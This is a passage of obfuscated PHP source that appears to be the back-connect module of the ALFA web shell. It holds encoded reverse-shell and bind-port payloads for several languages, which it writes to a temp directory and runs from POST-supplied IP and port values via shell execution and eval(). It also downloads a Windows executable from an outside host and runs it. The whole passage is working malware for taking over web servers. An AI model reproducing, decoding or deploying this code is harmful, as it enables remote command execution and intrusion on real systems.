164\x55\156\167\x33\127\x4f\162\x75\122\113\153\x65\x62\x42\71\x58\x6b\x4f\x67\53\x31\x31\110\103\153\x71\x65\102\157\123\x7a\x35\70\171\x33\106\146\x46\67\x38\x45\x78\x52\x34\115\172\x2f\x43\112\63\x6f\x6d\154\162\65\154\x42\x51\x37\x47\x38\x31\x30\164\x56\71\130\130\x70\x2b\x76\x37\x51\67\x6f\145\57\166\102\x6e\x63\144\x54\165\x51\x74\x53\171\146\62\x68\x59\x6e\x30\x59\145\x68\144\x64\107\126\167\x44\160\126\165\x68\x74\x6d\66\x56\113\x75\x53\113\x46\x50\60\x71\53\x32\153\x56\132\57\160\x4a\x5a\107\x35\57\117\x4c\x71\62\x42\x57\162\171\x71\144\x58\x70\71\x2b\156\60\71\156\x6b\62\102\60\x61\x57\111\60\124\x47\125\x73\145\142\x45\x4a\x6d\x46\67\x2f\x6d\x42\x75\x76\144\163\x78\70\x45\x76\x79\x63\x42\x71\117\x7a\x73\64\154\156\114\156\x31\x5a\166\141\x53\141\x77\x52\105\150\53\111\104\x61\x44\57\131\x4b\x4f\x77\102\112\x73\61\x54\166\101\151\145\110\x52\x6a\x4c\115\x31\103\x73\x66\x75\162\67\165\101\x6a\120\105\x73\171\x76\x54\x34\161\102\x35\122\66\x6a\115\101\x41\161\x4c\142\x54\165\x38\156\x61\x76\130\125\x49\x44\x67\x4a\x7a\x54\x4b\x34\150\104\116\x49\x46\x79\150\161\132\153\x76\x65\x74\111\124\x32\x4d\62\112\x4c\123\106\x65\x43\70\145\142\160\x32\x46\x33\154\x73\63\104\70\x4b\x77\132\x64\155\x41\x47\x4a\x74\114\105\172\124\x6b\x48\160\x67\x68\112\66\x6d\x62\x73\x78\x6e\x6e\x34\102\160\172\x79\x2f\x33\103\53\106\x76\65\x47\x6e\116\x4c\71\x43\167\x3d\75"; goto YVM_9; WbLvW: if (isset($_POST["\x61\154\146\x61\61"]) && !empty($_POST["\x61\154\x66\141\61"])) { goto g4_8a; HQtUI: $allow = array("\160\x65\x72\x6c", "\x72\165\142\171", "\x70\x79\x74\x68\157\156", "\156\157\x64\145"); goto pOMAu; pOMAu: eval("\x24\154\x61\x6e\x3d\x24" . $lang . "\x3b"); goto p1Rwf; smqQN: $tmpdir = ALFA_TEMPDIR; goto CKmAt; RpQG2: $ip = $_POST["\x61\154\146\141\62"]; goto vVexs; p1Rwf: if (in_array($lang, $allow)) { if (__write_file($name, __get_resource($lan))) { if (_alfa_can_runCommand(true, true)) { goto uM2u5; ee0eA: if ($out == '') { $out = "\x3c\146\x6f\x6e\x74\40\143\157\x6c\157\x72\75\x27\147\162\x65\145\156\x27\x3e\x3c\143\145\x6e\164\x65\x72\x3e\133\x20\106\x69\x6e\151\x73\x68\145\x64\x2e\x2e\x2e\41\x20\135\74\57\x63\145\x6e\x74\x65\x72\x3e\x3c\x2f\x66\x6f\x6e\x74\76"; } goto x9mOK; uM2u5: $os = $GLOBALS["\x73\x79\x73"] != "\167\x69\x6e" ? "\x31\x3e\x2f\144\x65\166\x2f\x6e\x75\154\154\40\62\76\x26\x31\40\x26" : ''; goto BAM19; x9mOK: echo "\x3c\160\x72\145\x20\143\154\x61\x73\163\x3d\47\x6d\154\x31\x27\40\x73\164\x79\154\145\x3d\47\155\x61\x72\147\x69\x6e\x2d\164\x6f\160\x3a\65\x70\x78\47\76{$out}\x3c\x2f\x70\x72\x65\x3e"; goto KwF_d; BAM19: $out = alfaEx("{$lang}\40{$name}\40{$arg}\40{$os}"); goto ee0eA; KwF_d: } } else { echo "\x3c\x70\x72\145\40\143\x6c\x61\163\x73\x3d\x6d\x6c\61\40\163\164\171\x6c\x65\75\x27\x6d\141\162\147\151\x6e\x2d\164\x6f\160\72\65\160\170\x27\x3e\x3c\146\157\x6e\164\x20\143\157\x6c\157\162\x3d\x27\x72\x65\x64\47\x3e\74\143\145\x6e\x74\x65\x72\76\133\40\106\x61\151\x6c\x65\x64\56\56\56\41\x20\x5d\x3c\57\x63\x65\x6e\164\x65\162\76\x3c\x2f\x66\157\x6e\x74\76\74\57\x70\x72\x65\76"; } } goto FGZwp; TQb7I: $arg = $_POST["\x61\154\x66\x61\x34"] == "\x62\151\x6e\x64" ? $port : $port . "\x20" . $ip; goto smqQN; CKmAt: $name = $tmpdir . "\x2f" . $lang . uniqid() . rand(1, 99999); goto HQtUI; yMLw5: if ($lang == "\x70\x68\160") { goto TjHWA; TjHWA: echo "\74\x70\x72\145\40\x63\154\141\163\x73\75\x6d\x6c\x31\x20\163\x74\x79\x6c\x65\x3d\47\x6d\x61\x72\x67\151\x6e\x2d\164\x6f\x70\x3a\65\160\170\x27\x3e"; goto qg23s; mBoXX: echo "\x3c\x2f\x70\x72\145\x3e"; goto Q15jf; lo1mh: if ($code !== false) { goto mGdQV; BgBoe: eval($code); goto NDrPU; NDrPU: echo "\x3c\x63\x65\156\x74\145\162\x3e\74\146\157\156\164\40\x63\x6f\154\157\162\x3d\47\x67\x72\x65\x65\x6e\47\x3e\133\40\x46\151\x6e\x69\163\x68\x65\x64\56\x2e\56\41\x20\x5d\x3c\x2f\x66\x6f\156\x74\76\74\57\x63\145\156\x74\145\162\76"; goto MArr9; mGdQV: $code = "\x24\x74\x61\162\x67\x65\x74\40\x3d\40\42" . $arg . "\42\x3b\xa" . $code; goto BgBoe; MArr9: } goto mBoXX; qg23s: $code = __get_resource($lan); goto lo1mh; Q15jf: } goto CTFmu; jGH92: if ($lang == "\142\143\167\x69\x6e") { goto O0xRM; L0djk: @fclose($f); goto Kf2os; O0xRM: $alfa = new AlfaCURL(); goto jQ1s6; wX9Iy: @fwrite($f, $s); goto L0djk; Kf2os: $out = alfaEx($tmpdir . "\57\x62\x63\x77\151\156\56\145\170\145\x20" . $_POST["\x61\154\x66\x61\62"] . "\40" . $_POST["\x61\x6c\x66\141\x33"]); goto uMdgN; cjH6w: $f = @fopen($tmpdir . "\x2f\x62\x63\167\x69\x6e\56\x65\170\145", "\167\x2b"); goto wX9Iy; jQ1s6: $s = $alfa->Send("\150\164\164\x70\x3a\x2f\x2f\x73\157\154\145\x76\151\x73\x69\142\154\145\x2e\x63\157\x6d\x2f\x62\143\x2f\167\x69\156\144\157\x77\x73\x2e\145\x78\x65"); goto AuVLE; AuVLE: $tmpdir = ALFA_TEMPDIR; goto cjH6w; uMdgN: } goto yMLw5; vVexs: $port = $_POST["\x61\154\x66\141\63"]; goto TQb7I; FGZwp: if ($lang == "\x6a\x61\x76\x61" || $lang == "\x63") { goto PwwmC; fn1xg: echo "\74\x70\162\145\x20\x63\x6c\x61\x73\x73\75\155\x6c\61\40\x73\x74\x79\154\x65\x3d\47\155\141\162\147\x69\156\x2d\164\x6f\160\72\65\x70\x78\47\76\74\143\x65\156\x74\x65\162\x3e{$out}\74\x2f\143\x65\156\164\x65\162\76\74\x2f\x70\x72\145\76"; goto WNTOW; HqaeE: $out = nl2br(bcinit($lang, $code, '', '')); goto fn1xg; PwwmC: $code = __get_resource($lan); goto HqaeE; WNTOW: } goto jGH92; g4_8a: $lang = $_POST["\x61\154\x66\141\61"]; goto RpQG2; CTFmu: } goto PhdsI; SUVC7: $cbArr = array("\160\x68\160" => "\x50\150\160", "\160\145\162\x6c" => "\120\x65\162\154", "\160\171\164\150\157\156" => "\x50\x79\164\150\x6f\156", "\162\165\142\x79" => "\122\x75\142\x79", "\x63" => "\103", "\x6a\x61\x76\x61" => "\112\141\166\x61", "\156\x6f\144\x65" => "\116\x6f\144\145\x4a\x73", "\x62\x63\x77\151\x6e" => "\x57\151\156\x64\157\x77\x73"); goto ZSPYk; Svnjx: $ruby = "\164\126\x62\67\x62\x39\115\x36\106\x50\67\x5a\x2b\123\165\115\x4e\x30\150\x7a\126\x78\x4c\x47\121\x2b\x68\x32\116\x36\x76\107\125\60\147\147\x71\x6a\x47\64\x51\x6d\121\x58\x74\x63\x35\x70\x59\x79\x31\x31\147\x75\63\121\x6f\127\63\70\67\x66\151\x56\x72\161\130\164\61\151\166\144\66\66\160\x31\145\163\67\156\x38\x2f\x54\65\62\160\x30\x37\123\x53\x4e\x46\115\x6d\x49\70\101\x66\x34\x64\151\x32\x62\60\x49\71\x6a\102\150\126\x4b\x31\x37\103\x58\x4a\x68\x4b\155\x69\107\x63\127\60\x6d\x69\x61\152\122\x30\70\146\x6e\x37\156\x50\121\115\x43\63\150\x67\x6e\x41\x6f\141\x7a\157\107\141\152\167\x57\x6c\101\x50\x56\143\x47\x48\x55\x77\151\104\111\x49\x63\x78\x6c\x67\x30\71\153\x77\105\123\157\x42\x72\102\x38\146\x48\x48\x5a\x35\53\x2f\104\164\64\x65\156\x62\170\x36\146\57\167\165\x7a\x71\x73\x5a\160\60\x4d\112\x38\130\123\157\141\116\105\112\160\x33\x4c\x47\x2b\113\x56\65\x54\x78\x6d\146\172\x4d\113\x6f\162\x30\121\x44\166\x66\107\167\154\102\x41\101\x7a\x35\61\x46\x41\143\x50\123\x4f\x4f\154\x49\112\123\x4a\164\117\x64\126\x37\x67\116\x67\x59\166\x32\111\154\x78\x48\x44\x4f\x70\x4a\112\x39\x72\71\124\x61\x67\131\x38\x6e\65\152\x43\172\x30\x72\147\x31\105\x4b\x76\x71\161\x77\67\116\x47\x44\x62\110\142\141\x52\131\x46\x63\x43\x78\x53\105\x55\70\153\143\62\157\x6b\62\x52\112\x30\151\x56\132\122\x69\x4a\x73\131\x54\x34\116\x34\x61\114\122\x68\x34\x36\117\x58\x33\53\x4b\x53\53\x41\x54\126\141\x54\x70\146\x6f\x44\61\115\161\x49\x76\x44\x30\x37\x54\x6e\x38\x6b\x2f\130\x78\67\x63\x2f\57\x50\60\131\x72\x2f\x37\x35\x47\157\63\66\x64\146\160\107\66\x35\147\101\x71\x4c\152\x45\x56\x46\x50\102\66\166\x73\x47\132\x6d\145\120\x42\x39\70\101\x50\105\144\150\111\x32\124\153\x47\64\144\127\121\61\x4e\x5a\x54\x79\153\x46\107\157\110\x70\x48\105\x74\x47\x46\x65\x59\62\104\132\147\x57\x55\x42\x5a\x34\150\66\155\x46\x65\x64\101\x46\x65\121\x5a\x4a\x78\131\63\x67\x67\x6e\x6a\71\163\153\x73\110\x53\x69\166\x6c\x4f\70\x46\130\x6c\x6a\152\x6c\x4a\x6f\x71\163\103\125\150\x6e\101\x50\106\60\166\x6f\132\144\x77\151\x63\x31\65\x56\121\53\117\124\154\70\x62\166\60\130\x49\107\131\x48\147\167\x2b\67\113\x64\x68\164\152\x76\64\x2b\x30\126\62\107\102\x35\64\166\x52\x59\x65\x32\x44\x73\x6b\103\63\x79\x66\x34\145\x79\166\x37\x4e\67\144\x48\107\145\110\x64\156\x76\x6f\x64\164\111\x64\155\x31\143\x30\x39\x77\x61\155\163\131\165\x75\x32\57\124\155\x50\123\131\170\x69\x66\x62\111\111\x56\154\103\172\121\x72\144\x61\126\x7a\161\x32\x43\145\x67\154\x68\115\x79\x53\x77\171\132\x42\101\170\x43\x56\117\x4b\132\x71\x45\172\171\160\127\154\x47\x7a\x69\x41\x54\x2f\x64\x31\153\x42\x65\53\162\125\x38\x61\60\x71\113\132\x31\x6d\150\x4b\171\101\166\105\167\x59\x34\x66\x6d\x4f\x50\x34\152\x59\x57\x73\150\132\160\x56\x70\66\x65\x2b\117\122\151\x61\x73\x47\64\141\x52\x4d\67\172\170\x52\110\x74\61\x63\x7a\x30\57\x56\x46\x58\x69\122\67\x39\x54\122\150\x76\122\x7a\x73\145\x38\x51\114\143\147\130\x7a\x43\x68\166\127\166\114\x4e\x77\x48\116\132\x64\66\x6b\x32\x36\x34\152\103\167\x33\61\x5a\143\x70\155\x76\122\166\x4c\164\103\x35\160\x56\x36\x65\x74\x45\67\157\x4e\57\160\x2b\155\102\122\164\x4e\x76\x58\x6b\146\61\x31\x55\x4e\x76\106\116\62\x69\x53\x44\122\170\123\x57\x72\x4c\x6c\x76\172\162\x44\112\x73\x6b\x2b\x38\x52\120\132\144\67\x4b\x37\x36\165\147\155\x33\x44\x2f\x6c\x32\x32\53\114\x31\71\x46\x69\x42\160\x63\63\63\166\116\x66\x6e\x4e\66\x51\x57\64\142\x4d\x52\61\x42\152\x4b\x6d\x5a\142\x57\121\153\x55\167\65\x4b\64\x50\127\x6c\x75\166\150\105\x72\105\71\164\x41\123\65\147\144\x69\60\x6f\x31\x56\161\117\x39\104\123\x49\x72\130\146\71\x6b\x38\61\170\65\157\103\53\157\101\x63\x34\x54\162\107\163\x7a\x38\x65\x6a\166\106\x32\x4c\157\157\x72\x79\x33\x70\x49\142\x73\x46\x78\x79\102\105\143\x51\153\166\x55\x68\150\x41\x61\141\x37\66\x30\x6a\111\141\x4d\165\57\53\142\x79\x46\103\142\x32\x54\x7a\157\x31\121\x75\x6c\x6c\x53\61\x68\x53\x55\x64\131\127\157\112\x75\x49\123\x6b\142\x50\61\162\x44\124\115\x6a\x4c\106\66\156\x49\171\x74\x42\x6d\64\153\x48\164\157\x54\125\x30\147\71\162\104\151\64\172\x69\150\125\x76\x6b\64\x55\123\62\x64\63\142\144\155\x4c\103\x74\171\62\x39\x4d\163\x44\x6d\113\x64\x70\x42\x58\x33\123\x35\162\x2f\157\61\x7a\x38\x4d\x68\x31\60\171\155\63\x6e\115\64\154\x70\x33\65\x33\155\57\70\x7a\163\110\x62\x67\153\x4a\70\x32\105\x36\127\142\115\57\x31\x6b\x4a\x77\x7a\65\x38\x58\113\124\x5a\x38\106\107\x38\x67\163\75"; goto oIYte; Kax0T: alfahead(); goto r7DwB; ObzMC: echo "\x3c\146\157\x72\155\40\x6f\156\x53\165\x62\x6d\151\x74\75\x22\147\50\47\x63\x6f\x6e\156\145\143\164\x27\x2c\156\165\154\x6c\x2c\x74\150\x69\x73\56\163\145\x6c\145\x63\164\103\142\56\166\141\x6c\165\x65\x2c\x74\150\x69\x73\x2e\x73\145\162\166\145\x72\x2e\166\141\154\x75\145\x2c\x74\x68\x69\163\56\x70\157\162\164\x2e\166\x61\x6c\165\x65\x2c\164\150\151\x73\x2e\x63\x62\155\x65\x74\x68\157\x64\56\166\x61\x6c\x75\x65\x29\73\162\x65\x74\x75\162\x6e\40\146\141\x6c\x73\x65\x3b\x22\76\xd\12\74\x64\x69\166\40\x63\154\x61\163\x73\x3d\x22\x74\x78\x74\x66\157\156\164\x22\x3e\115\145\x68\x74\x6f\x64\72\x3c\57\x64\x69\x76\x3e\40\74\x73\x65\x6c\145\x63\x74\x20\x6e\141\155\145\75\x27\143\x62\155\x65\164\x68\x6f\144\x27\40\x6f\156\103\150\x61\x6e\x67\x65\x3d\47\x63\164\x6c\x62\x63\x28\164\150\151\163\x29\x3b\47\x20\x73\x74\171\x6c\x65\x3d\x27\x77\151\x64\164\x68\x3a\61\62\60\x70\x78\x3b\x27\x3e\74\157\160\164\x69\x6f\156\x20\166\141\154\165\x65\75\47\142\141\x63\153\47\76\122\x65\x76\145\x72\x73\145\40\123\x68\145\x6c\x6c\x3c\x2f\157\160\164\151\x6f\x6e\76\x3c\x6f\x70\164\151\157\156\40\166\x61\154\x75\145\75\x27\x62\151\156\144\x27\x3e\102\151\x6e\144\x20\x50\x6f\x72\x74\74\57\157\x70\x74\x69\157\156\x3e\x3c\57\x73\145\154\145\x63\x74\x3e\x20\74\x64\151\x76\40\x63\154\x61\x73\163\x3d\x22\x74\170\x74\x66\157\x6e\164\x22\x3e\x55\163\x65\x3a\74\x2f\x64\x69\166\76\40\74\163\x65\154\x65\143\x74\40\156\x61\155\x65\x3d\x27\163\145\154\145\143\164\x43\142\47\x3e"; goto SUVC7; YVM_9: $perl = "\154\132\x4c\x52\x6a\x70\116\x41\x46\111\x61\166\x32\x36\x54\x76\x4d\x4f\x4a\x73\103\70\x6b\131\127\162\x31\142\160\112\106\x51\63\x44\122\x72\x53\x38\x4f\x77\107\155\x4f\126\x73\x50\x53\x73\124\x4b\121\x44\x67\x56\155\63\155\x2b\x37\x32\x32\132\60\102\x56\151\x66\x47\x47\114\60\x37\x35\x35\57\x44\144\x2b\101\142\x6e\x6a\x2b\x7a\x62\x35\x76\141\x76\155\x62\x63\102\x76\64\144\x56\x56\101\130\157\x2b\x46\164\x41\x32\x67\132\x6e\x70\57\x54\x4d\166\x73\x47\x77\150\x6b\x4e\143\144\x6d\x34\x2b\x45\x75\x6f\161\x69\132\x33\104\124\x68\x55\x5a\123\x31\x51\110\x45\121\162\71\x79\103\x67\63\152\x73\x62\x4f\156\x4d\x6e\127\67\x7a\x35\x73\x4e\152\x4f\112\x30\65\x2f\x4c\153\117\156\x4a\124\143\65\145\x73\105\x4d\x2b\124\x53\67\x4d\122\130\161\x74\114\x66\166\x5a\115\171\163\131\64\x73\67\70\x38\x4d\x56\63\x51\124\x2b\x47\x62\111\x76\x44\145\144\x52\x4c\150\x48\165\126\x78\x42\x56\x58\131\x72\171\x2b\x70\66\156\x65\172\101\x6e\111\x71\163\155\154\151\121\x30\x37\x53\165\132\x6c\x49\x77\63\x62\65\120\154\117\157\152\x4a\x6d\x49\142\x2b\132\125\x4c\152\113\x50\x42\127\x42\101\166\162\x34\x57\x48\110\x77\x4c\x53\66\142\x57\53\70\x36\117\x4b\x39\x36\x38\66\x73\64\x32\x67\x34\167\112\x57\x4c\126\x66\x39\160\x2b\x6c\x6d\x65\x44\150\157\121\x69\154\x5a\x57\103\x6b\x66\104\x64\x34\x6b\103\123\123\101\x4e\153\x79\x69\x34\157\x6f\107\x33\x57\x45\122\153\x70\x6b\x41\x44\53\122\105\x37\117\x61\124\107\x30\71\x32\x75\x54\150\147\63\x63\x55\x57\127\141\172\x57\x53\145\117\x75\x50\154\162\x5a\61\125\x4c\x42\x47\x41\112\x66\152\x72\x2f\121\60\172\124\x4b\121\x6d\x33\170\103\162\x57\x36\x35\x4a\120\x72\x45\x4f\103\x47\x76\x75\x45\x6c\x52\104\x4f\153\145\x30\x52\x79\113\x41\x70\62\62\63\x43\x44\x54\144\x71\x69\x73\x67\103\115\141\114\x35\132\x72\131\x72\167\145\53\x34\x62\172\x46\111\122\130\115\x54\110\x6d\145\150\x4a\x45\x55\x5a\57\111\65\53\x41\x41\107\x5a\x4a\x71\164\x66\126\132\125\x54\x5a\147\x2b\160\x62\124\106\146\x52\x6e\x6f\145\150\x61\x49\70\154\141\112\x36\x6c\127\x42\62\121\103\124\127\125\x6c\114\167\x65\113\65\x70\146\x59\x6c\63\70\x53\x69\x2f\x4f\x2b\x6e\x58\125\164\143\170\x6b\x48\153\x61\123\x69\x6c\x4e\x70\171\x58\x51\160\117\x33\x64\53\x63\131\x71\141\x66\132\x79\x58\x6e\x6b\x4b\x6e\67\x77\141\x6d\145\x74\x2f\142\157\x50\71\147\172\145\x33\x76\x7a\115\124\x55\163\x35\171\156\160\71\x65\154\x52\x37\60\71\x46\x66\170\120\64\x66\x39\64\66\127\63\102\125\x2b\x6b\x7a\65\112\172\x33\53\x41\101\75\x3d"; goto Svnjx; oIYte: $node = "\156\126\x48\x4c\141\163\x4d\167\105\104\x77\x72\x6b\110\70\121\166\154\151\103\x6f\105\104\124\127\70\x69\150\71\x42\x50\123\127\x2f\160\x41\x74\x64\145\x52\x51\x4a\132\143\x53\x58\x59\x4b\x49\146\x6e\62\x79\162\x4b\x64\x35\x74\107\127\x59\150\53\105\144\62\x64\x32\x4e\104\164\161\x75\115\127\x75\64\x6a\165\x4e\x56\71\x6a\x43\x52\171\60\164\153\104\121\x54\125\x75\126\166\x6c\x54\125\x5a\117\x4a\144\123\106\147\x6e\114\66\x61\x51\x4a\x5a\101\63\x2b\x6e\x42\162\x4b\x6c\x50\141\121\70\170\x5a\x34\x65\x59\x35\x32\x6e\122\x4d\x68\x4d\71\157\132\102\122\x64\130\144\141\61\x49\66\x56\x55\105\113\x42\x55\x6f\x36\x66\170\x64\66\162\153\x54\141\125\x42\x6b\121\130\x6f\x33\162\106\x4c\143\106\x38\141\127\x72\x4f\x51\x2b\x45\x32\x54\53\165\x67\163\x73\123\x65\156\63\130\106\x62\155\104\104\64\x68\120\123\x6c\171\165\62\60\x43\x4d\103\151\60\x5a\141\x66\132\x2f\152\105\x46\145\x75\166\x46\141\x72\127\147\x2b\53\153\x45\164\130\167\x52\171\x47\105\x76\x6c\x67\x58\172\x48\x74\132\147\107\67\x43\153\x71\110\130\155\x70\x64\110\x45\122\122\x35\x79\x62\107\145\154\x42\x35\x49\143\x38\x59\115\x71\117\110\x35\x71\x56\61\71\x48\x44\70\x64\156\156\142\x54\67\x34\120\x37\x72\164\x67\161\x69\x4d\125\x63\123\x6a\132\x37\x6a\124\152\x44\x6e\143\66\155\132\102\x56\145\x58\121\117\x67\61\x5a\x47\162\120\167\x73\61\112\x7a\x6a\x31\x50\132\157\115\124\x54\116\161\141\x37\147\x63\x6e\x73\126\x6f\x65\x62\160\x58\x42\62\160\110\x6a\146\64\60\x4e\160\155\53\x6d\x55\x58\x63\113\160\x71\x54\172\x6f\x47\120\113\155\67\x75\x58\x74\x6e\x6d\131\124\153\x41\65\x77\116\146\x5a\63\x35\x2b\x79\144\x78\146\x5a\120\170\161\164\157\131\165\x39\126\65\x6e\x46\x31\x39\167\x73\157\x74\170\57\x48\147\x48\x39\x6c\152\67\x36\111\x58\131\60\115\x6d\70\60\115\x6d\x67\60\x4c\165\110\104\106\167\75\x3d"; goto n7bWx; PmlaC: alfafooter(); goto Zt7M9; A7nOA: $java = "\154\126\x52\116\x62\x39\163\x77\x44\104\x32\x6e\121\x50\53\x44\64\x4a\115\71\102\107\x36\124\x30\x34\x62\x43\167\172\66\167\167\64\101\102\x48\x5a\142\145\165\150\x77\125\150\142\107\61\x32\162\x49\147\x30\x58\107\x43\x4e\120\x76\164\157\172\67\163\165\155\163\166\x50\144\x69\127\171\x43\x66\x79\x38\132\107\x79\x62\x48\x52\x72\x6b\120\63\x68\145\65\67\114\x4e\x6e\x39\63\x63\63\153\x68\x4a\171\131\106\66\107\62\130\x46\x37\162\142\61\106\x49\167\125\130\x4e\x72\107\141\x39\63\x2f\x41\65\64\x63\67\161\x38\155\x47\153\x6a\71\x78\171\102\127\145\122\x49\147\x4a\61\x55\166\111\64\167\x6a\x51\167\117\103\x47\x70\x72\62\126\61\154\147\107\70\144\146\x6a\x7a\x77\x58\x65\153\117\126\x30\x6a\62\150\x6b\154\x37\115\63\x58\x64\144\x76\x6a\x6b\x61\x7a\x76\x30\104\x4d\x67\x64\x4f\x47\150\x4d\156\65\53\x64\x76\x7a\151\121\156\x62\x43\123\x4e\x70\145\x32\157\115\150\x2b\x53\143\142\x43\122\x54\x71\x48\125\x4a\x39\165\x39\62\x43\115\63\115\111\153\x37\x72\x36\126\x57\x32\x59\x36\x6c\127\141\145\65\x77\172\x4e\x4d\x53\x78\x6d\155\171\120\103\x2f\132\x70\x74\127\x4d\105\x55\71\x4d\170\166\63\x79\x38\x2b\114\116\143\x33\167\x53\70\126\115\153\106\x4f\x79\165\120\113\x54\104\144\x5a\144\x50\x53\126\x72\x43\x45\x56\110\64\x76\x72\152\x4d\x56\x59\x4d\x32\113\x52\71\60\x59\151\x70\x4a\166\x35\x39\126\x77\115\x55\x47\x2f\x66\x31\x5a\x32\x74\60\164\x48\60\141\163\x79\x7a\x2f\x34\123\x33\x34\x43\x69\x71\x39\x4e\164\x42\147\x45\142\x5a\113\147\142\132\103\130\x4a\x53\125\x5a\105\127\x58\x44\172\x63\107\123\x36\x41\167\x6e\155\x77\x65\x34\130\x71\x59\67\62\x78\131\x37\67\163\150\153\x75\x56\x6b\x6e\65\x53\154\126\121\157\116\66\x55\116\111\x72\152\113\x33\x44\x6a\64\x33\115\x48\x50\122\114\115\154\x58\x73\156\126\x52\x71\x6f\x72\127\x79\130\x65\x4a\130\146\160\66\155\147\x52\155\x72\167\x45\57\107\154\141\x44\x51\x61\x50\141\144\x4c\x61\x58\120\105\x47\153\151\172\x48\71\153\146\x62\147\x2f\156\113\x4c\122\110\x4b\x70\144\x72\103\64\x58\x61\x58\x4a\x72\61\x55\123\x65\142\x6b\x4f\x63\127\157\x39\105\153\103\x33\x35\151\164\144\x39\x61\x2f\67\104\x4f\116\x48\x48\x4d\172\x78\61\131\126\61\x44\x58\67\x2b\61\165\x46\x7a\112\120\145\x39\x43\67\65\x46\71\x72\x62\x4b\117\x47\161\x46\x51\53\x41\162\x49\x70\71\103\x39\x76\157\107\67\164\114\61\106\62\x39\145\121\62\x71\x78\x4b\157\x6f\106\x72\x48\x39\x4d\63\x38\x4e\103\160\x70\124\150\x42\112\115\162\x72\x6d\170\121\102\x75\x50\166\x72\x39\145\104\57\x31\x59\x67\x61\106\x5a\x69\161\156\163\153\107\x70\x69\124\106\62\147\x41\x65\x32\x34\x32\x4a\167\114\61\67\107\150\x30\141\x47\x58\125\x46\x74\147\x2f\65\116\132\x76\160\x56\x4d\x45\x45\x31\161\x77\156\162\x58\x59\x6a\x31\x4a\120\102\x46\x42\x36\152\155\142\70\104\x71\57\114\x67\x56\67\x66\107\123\x76\70\65\156\145\x77\x46\113\x36\x73\x69\165\156\x2f\163\x51\x38\x6a\x76\107\x7a\x79\x31\155\x32\111\63\132\161\110\x38\x48\x6b\x48\x32\x37\110\x59\113\x4a\170\105\165\x42\53\x4a\63\124\167\x56\66\144\121\116\x75\x43\117\170\171\126\x4e\105\x78\x78\101\x70\104\x51\64\127\x66\170\120\153\106\157\60\164\x59\164\131\x4d\117\x6d\163\x58\x31\103\142\117\x79\x4a\104\101\x6f\144\145\120\161\x46\x4c\x39\60\146\x52\x4c\170\x6d\117\70\x45\126\x4f\x56\x38\x65\x34\x39\165\156\154\165\x48\x79\123\x30\x62\x2f\145\x63\104\120\160\x4f\146\x38\x44"; goto hfu2N; PhdsI: echo "\x3c\x2f\144\x69\166\x3e"; goto PmlaC; r7DwB: $php = "\x37\x56\132\164\141\71\x73\167\105\120\65\x65\66\x48\x39\x51\x6a\141\105\x32\123\65\x75\130\146\x68\x67\x30\160\x44\x42\131\x50\x77\x37\113\126\x74\151\110\164\x6a\x4f\x4f\x4c\116\143\x69\x74\161\126\x4a\70\x70\x4b\170\x70\142\71\x39\x64\63\66\x4c\x34\x7a\151\144\61\67\x57\167\x51\126\61\x77\162\142\166\124\x6f\x30\x65\66\117\x7a\x31\150\x53\x67\x6e\x6c\113\123\141\x46\x4d\152\x79\x39\x64\60\x62\x75\71\120\x42\101\115\53\115\x5a\156\x6a\x41\x76\65\147\x6b\63\150\125\x33\115\120\x5a\67\x49\155\106\x4e\165\x76\104\x44\117\x64\117\x53\x67\x31\124\x61\53\x75\155\x64\x47\153\x78\x6c\x68\113\x78\x6d\114\x67\x44\153\x57\x73\121\x61\153\164\117\143\x68\106\114\x33\x6a\x73\x37\x4f\x33\117\106\x6a\x36\115\105\151\172\x4f\x4d\x59\x42\141\167\65\60\102\101\x4d\114\x55\111\101\112\x75\x62\67\x38\x2b\107\x47\62\115\153\167\x6c\60\x36\x74\x50\64\71\x6e\170\x72\x58\x33\61\x2b\x66\x33\106\x38\142\122\60\147\62\60\x36\156\x50\116\60\x43\112\x4e\x4f\165\111\x58\124\105\65\172\x39\121\x4e\x37\x46\157\x55\x2b\x75\155\132\x38\x51\x48\x62\x45\x34\x4a\x67\x2f\153\x38\x41\104\71\x50\103\x51\x4f\x46\126\154\x71\156\x49\x71\x79\123\x32\132\x41\171\x79\x55\x2f\104\x67\x38\111\120\x4c\x59\x45\147\116\111\x33\x4c\125\60\x35\x49\66\x73\x61\107\x52\x7a\102\x6f\147\106\x61\x31\x6f\124\x46\155\165\61\x42\x6e\x58\123\x69\66\x70\x76\122\x58\122\x4f\x35\116\x6f\x2f\166\164\x70\146\167\x36\x53\x4a\x66\x6f\155\101\144\x5a\151\153\x31\130\113\121\x65\x57\63\106\164\x74\110\115\x73\x61\127\x70\x69\x4c\x78\122\x71\143\x65\167\62\106\x75\x49\x42\x54\x4e\x37\x34\x38\166\123\x67\102\x7a\105\113\x37\64\x79\143\x34\111\131\x42\170\172\152\152\x74\x72\165\x30\152\65\x70\62\113\x54\x52\x66\x65\x56\x41\x4e\x6d\147\x65\x4f\x32\167\x46\x51\x55\153\124\x65\61\144\x6c\x73\x47\x47\110\141\164\x56\x47\x51\103\60\70\x4c\x75\x6f\103\141\60\153\170\71\131\70\x71\170\104\x4a\130\x6e\x77\x2b\x48\157\116\x50\x38\x37\164\x38\147\160\x30\x49\145\x61\131\125\161\x6c\157\x76\x67\120\70\x79\x6f\151\x46\x55\122\132\x6b\x79\x4b\104\x77\71\x59\104\x63\x6c\131\x7a\164\x65\x6e\117\x51\x6a\x36\154\124\x47\112\x63\143\172\143\121\131\153\x51\x73\154\163\x42\101\132\63\115\131\x4f\x54\x4b\x53\130\160\142\x36\103\x58\120\x63\101\122\153\x42\160\x70\164\x76\x30\154\162\171\144\x4c\x4d\x50\x66\x4d\x4b\x6c\64\157\x59\x35\x4e\x67\x56\62\103\144\103\106\x74\x4e\x45\x6c\110\163\x6b\x70\x73\123\66\x73\x61\150\106\70\x6c\150\107\120\x47\132\64\x6f\117\x51\113\153\60\111\x63\x69\62\125\113\161\151\x79\x4c\x45\61\101\x4e\151\x63\63\112\x39\x37\157\162\x64\x65\64\x6c\166\141\117\x52\x59\x51\x78\162\x63\105\165\x66\x6d\171\66\62\53\145\53\x4d\x4f\x4f\146\x59\x57\156\160\x56\x53\x37\147\65\x75\152\x68\x31\x67\x47\131\102\67\x55\61\x56\x74\x64\113\x36\x39\147\x43\x73\110\x49\x67\x47\103\x52\x74\126\63\x52\67\x51\164\101\x47\x74\67\162\66\62\x6f\x54\122\x73\x59\x78\x5a\x50\155\105\x64\165\171\120\105\171\x73\106\157\166\x38\x2f\105\156\62\x52\x6e\x7a\116\x49\115\111\x6c\x63\x38\x6a\x67\x6f\157\127\120\x36\x41\x55\116\110\170\16